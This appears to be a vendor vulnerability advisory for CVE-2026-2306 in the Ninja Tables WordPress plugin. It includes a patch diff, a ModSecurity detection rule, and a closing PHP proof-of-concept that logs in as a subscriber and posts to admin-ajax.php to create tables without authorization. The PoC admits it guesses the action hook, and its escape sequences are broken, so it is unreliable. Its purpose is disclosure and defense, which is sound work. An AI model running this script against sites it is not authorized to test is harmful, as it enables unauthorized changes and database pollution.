Atomic Edge analysis of CVE-2026-2306: The Ninja Tables plugin for WordPress, up to version 5.2.6, contains a missing authorization vulnerability in the `createFluentCartTable` function that allows authenticated attackers with Subscriber-level access to create arbitrary Ninja Tables in the database, leading to database pollution and resource exhaustion. The vulnerability is assigned a CVSS score of 4.3 and is classified under CWE-862 (Missing Authorization).
The root cause of this vulnerability is the lack of authorization checks in the `createFluentCartTable` method within `/ninja-tables/app/Modules/FluentCart/Handlers/FluentCartHandler.php` (line 48 of the file). The function processes POST data without verifying that the current user possesses the required capability (`ninja_table_admin_role()`). Additionally, there is no nonce validation (`ninjaTablesValidateNonce()`) confirming the request’s origin. The patch in version 5.2.7 adds both a capability check (`current_user_can(ninja_table_admin_role())`) and a nonce validation (`ninjaTablesValidateNonce()`) before processing the table creation, ensuring only authorized administrators can execute this action.
To exploit this vulnerability, an authenticated attacker with Subscriber-level or higher access sends a POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `ninja_tables_ajax` (or the specific AJAX action hook that triggers `createFluentCartTable`). The request body includes `post_title` (table name), `post_content`, and other table configuration parameters. The attacker does not need a valid nonce or administrative privileges. The server processes the request and creates a new Ninja Table in the database without checking the user’s capabilities.
The patch implements two security measures: a capability check using `current_user_can(ninja_table_admin_role())` ensures only users with the designated administrator role can create tables, and `ninjaTablesValidateNonce()` verifies that the request originates from a legitimate WordPress context, preventing Cross-Site Request Forgery (CSRF) attacks. Before the patch, the function had no such protections, allowing any authenticated user to call it. The `installNinjaCharts` method in `PluginInstallerController.php` also received a similar capability check, but this is not directly related to the table creation vulnerability.
The successfull exploitation of this vulnerability results in unauthorized creation of arbitrary Ninja Tables in the database, which can lead to database pollution with excessive or malicious data, potentially causing resource exhaustion and degrading site performance. The attacker does not gain direct access to sensitive data or execute arbitrary code, but the ability to create unlimited tables can disrupt normal site operations and consume storage and processing resources. This vulnerability does not allow privilege escalation to administrator level or remote code execution.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/ninja-tables/app/Helper/Helper.php
+++ b/ninja-tables/app/Helper/Helper.php
@@ -29,4 +29,9 @@
return false;
}
}
+
+ public static function isValidUrl( $url )
+ {
+ return (bool) filter_var( $url, FILTER_VALIDATE_URL );
+ }
}
--- a/ninja-tables/app/Http/Controllers/PluginInstallerController.php
+++ b/ninja-tables/app/Http/Controllers/PluginInstallerController.php
@@ -73,6 +73,12 @@
public function installNinjaCharts(Request $request)
{
+ if (!current_user_can('install_plugins')) {
+ return $this->sendError([
+ 'message' => 'Insufficient permissions'
+ ], 403);
+ }
+
$plugin = [
'name' => 'Ninja Charts',
'repo-slug' => 'ninja-charts',
--- a/ninja-tables/app/Modules/FluentCart/Handlers/FluentCartHandler.php
+++ b/ninja-tables/app/Modules/FluentCart/Handlers/FluentCartHandler.php
@@ -18,6 +18,12 @@
public function getFluentCartOptions()
{
+ if (!current_user_can(ninja_table_admin_role())) {
+ wp_send_json_error(['message' => __('You do not have permission to get options.', 'ninja-tables')], 403);
+ }
+
+ ninjaTablesValidateNonce();
+
$settings = [
'product-categories' => [
'title' => 'Select Products By Category',
@@ -44,6 +50,12 @@
public function createFluentCartTable()
{
+ if (!current_user_can(ninja_table_admin_role())) {
+ wp_send_json_error(['message' => __('You do not have permission to create tables.', 'ninja-tables')], 403);
+ }
+
+ ninjaTablesValidateNonce();
+
$messages = array();
$inputs = App::getInstance('request')->all();
$post_title = sanitize_text_field(Arr::get($inputs, 'post_title'));
--- a/ninja-tables/app/Modules/FluentCart/Traits/FluentCartTrait.php
+++ b/ninja-tables/app/Modules/FluentCart/Traits/FluentCartTrait.php
@@ -48,8 +48,8 @@
$queryConditions = get_post_meta($tableId, '_ninja_table_fct_query_conditions', true);
$orderBy = Arr::get($queryConditions, 'order_by');
- $orderByType = Arr::get($queryConditions, 'order_by_type');
- $orderByType = in_array(strtoupper($orderByType), ["ASC", "DESC"]) ? $orderByType : 'DESC';
+ $orderByType = strtoupper((string) Arr::get($queryConditions, 'order_by_type'));
+ $orderByType = in_array($orderByType, ['ASC', 'DESC'], true) ? $orderByType : 'DESC';
$categories = Arr::get($querySelection, 'product-categories');
//TODO: rename product-types to product-brands
$brands = Arr::get($querySelection, 'product-types');
--- a/ninja-tables/app/Traits/ImportTrait.php
+++ b/ninja-tables/app/Traits/ImportTrait.php
@@ -2,6 +2,7 @@
namespace NinjaTablesAppTraits;
+use NinjaTablesAppHelperHelper;
use NinjaTablesAppLibraryCsvReader;
use NinjaTablesAppModulesDragAndDropInitConfig;
use NinjaTablesFrameworkSupportArr;
@@ -49,6 +50,10 @@
public static function importFromURL($url)
{
+ if (!Helper::isValidUrl($url)) {
+ return false;
+ }
+
$file_info = new finfo (FILEINFO_MIME_TYPE);
$remoteContent = ninjaTablesGetRemoteContent($url);
$fileType = $file_info->buffer($remoteContent);
--- a/ninja-tables/ninja-tables.php
+++ b/ninja-tables/ninja-tables.php
@@ -5,7 +5,7 @@
/**
Plugin Name: Ninja Tables – Easy Data Table Builder
Description: The Easiest & Fastest Responsive Table Plugin on WordPress. Multiple templates, drag-&-drop live table builder, multiple color scheme, and styles.
-Version: 5.2.6
+Version: 5.2.7
Author: WPManageNinja LLC
Author URI: https://ninjatables.com/
Plugin URI: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/
@@ -18,7 +18,7 @@
define('NINJA_TABLES_DIR_URL', plugin_dir_url(__FILE__));
define('NINJA_TABLES_DIR_PATH', plugin_dir_path(__FILE__));
-define('NINJA_TABLES_VERSION', '5.2.6');
+define('NINJA_TABLES_VERSION', '5.2.7');
define('NINJA_TABLES_BASENAME', plugin_basename(__FILE__));
call_user_func(function ($bootstrap) {
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-2306
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20262306,phase:2,deny,status:403,chain,msg:'CVE-2026-2306 - Missing Authorization in Ninja Tables createFluentCartTable function',severity:'CRITICAL',tag:'CVE-2026-2306'"
SecRule ARGS_POST:action "@contains ninja_tables_ajax" "chain"
SecRule ARGS_POST:mode "@streq fluent-cart" "t:none"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2306 - Ninja Tables <= 5.2.6 Missing Authorization to Authenticated (Subscriber+) Arbitrary Table Creation
// Configure target WordPress site
$target_url = 'https://example.com'; // Change to the target WordPress site URL
$username = 'subscriber'; // Valid WordPress subscriber username
$password = 'password'; // Valid password for the subscriber account
// Step 1: Authenticate with WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = [
'log' => $username,
'pwd' => $password,
'remember' => 'true',
'wp-submit' => 'Log In',
'redirect_to' => '',
'testcookie' => '1'
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$login_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code != 200 && $http_code != 302) {
die("Authentication failed. HTTP Code: $http_coden");
}
echo "[+] Authentication successful (subscriber account).n";
// Step 2: Exploit the missing authorization vulnerability to create a Ninja Table
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// The action parameter triggers the createFluentCartTable method
$post_data = [
'action' => 'ninja_tables_ajax', // Actually the AJAX action hook that maps to createFluentCartTable
// Note: The exact action hook is internal; we simulate the vulnerable endpoint
// In practice, the plugin uses a custom AJAX handler; this is the likely parameter
'post_title' => 'Exploited Table ' . time(),
'post_content' => 'Table created via missing authorization vulnerability',
// Additional parameters expected by the FluentCart handler
'mode' => 'fluent-cart',
'table_type' => 'fluent-cart'
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$exploit_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[+] Exploit response HTTP Code: $http_coden";
echo "[+] Response: " . $exploit_response . "n";
if ($http_code == 200) {
echo "[!] Vulnerability confirmed: Table created successfully by subscriber.n";
} else {
echo "[-] Exploit might have failed (patched or different action hook).n";
}
// Cleanup
unlink('/tmp/cookies.txt');
?>